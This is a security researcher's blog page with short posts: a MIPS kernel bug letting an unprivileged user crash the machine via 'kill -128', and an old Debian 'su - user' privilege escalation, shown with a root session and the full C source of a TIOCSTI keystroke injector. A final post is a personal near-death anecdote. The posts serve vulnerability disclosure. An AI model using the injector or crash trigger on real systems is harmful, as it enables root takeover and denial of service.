Georgi Guninski's blog

BUG_ON() on mips kernels 4.17.2 and earlier (old but alive)

This is old but alive.

On mips kernel 4.17.2 and earlier unprivileged user can trigger
BUG_ON() possibly causing denial of service on the whole machine.

Suggested patches from 2013 are in the thread at:
https://www.spinics.net/lists/mips/msg73398.html


in 4.17.2 ./kernel/exit.c

do_group_exit(int exit_code)
{
        struct signal_struct *sig = current->signal;

        BUG_ON(exit_code & 0x80);

|do_group_exit| is called from

./kernel/signal.c:2482:         do_group_exit(ksig->info.si_signo);

Appears to me si_signo can be 0x80 (in decimal 128) because of:

arch/mips/include/uapi/asm/signal.h:15:#define _NSIG            128

Probably testcase will be:
$kill -128 `pidof program`

Ancient "su - hostile" vulnerability in debian 8 and 9

Just FYI.

Warning: This is rather old, since at least 2005, probably
much earlier. Check the links at:
http://www.openwall.com/lists/oss-security/2018/06/12/2

Summary: Doing "su - hostile" in debian 8 and 9 may lead
to root privilege escalation. Default sudo -u probably is
affected too.

Per chat with some admins they use su - user.

Session:

root@machine1:~# su - guest4
guest4@machine1:~$ (sleep 10; /tmp/a.out id) &
[1] 4737
guest4@machine1:~$ exit
logout
### just wait
root@machine1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@machine1:~# cat /tmp/tty.c 
/*
 *
 * https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty
 * */
#include <sys/ioctl.h>
#include <termios.h>
#include <stdio.h>
#include <stdlib.h>

void stackchar(char c)
{
  if (ioctl(0, TIOCSTI, &c) < 0) {
    perror("ioctl");
    exit(1);
  }
}
int main(int argc, char *argv[])
{
  int i, j;
  char c;

  for (i = 1; i < argc; i++) {
    for (j=0; (c = argv[i][j]); j++) {
      stackchar(c);
    }
    stackchar('\n');
  }
  exit(0);
}

Are `su user' and/or `sudo -u user sh' considered dangerous?

Per vague memory I discussed half of this with some linux crowd and
they said "won't fix" long ago.

`su user' and `sudo -u user sh' give the user the fd of root's tty
and it is readable and writable. After closing the session, the
user can keep it and on root's tty potentially do:

1. inject keypresses via ioctl()
and/or
2. read the output of root's tty, probably with some analogue of
tee(1).

Is this really a concern?

Any workarounds?

Near death experience

Long ago I have lost consciousness. According to the doctors' logs
have been very close to death. To my surprise I have memories about
this time: Flying in a tunnel with very strange lights and everything
was super calm. Never saw such lights even in computer games. The
closest of one of lights is the light of eyes examination with light
source and pupils widened.

Wikipedia has a page "Near death experience". Looks like establishment
science has some interest in this stuff, lol.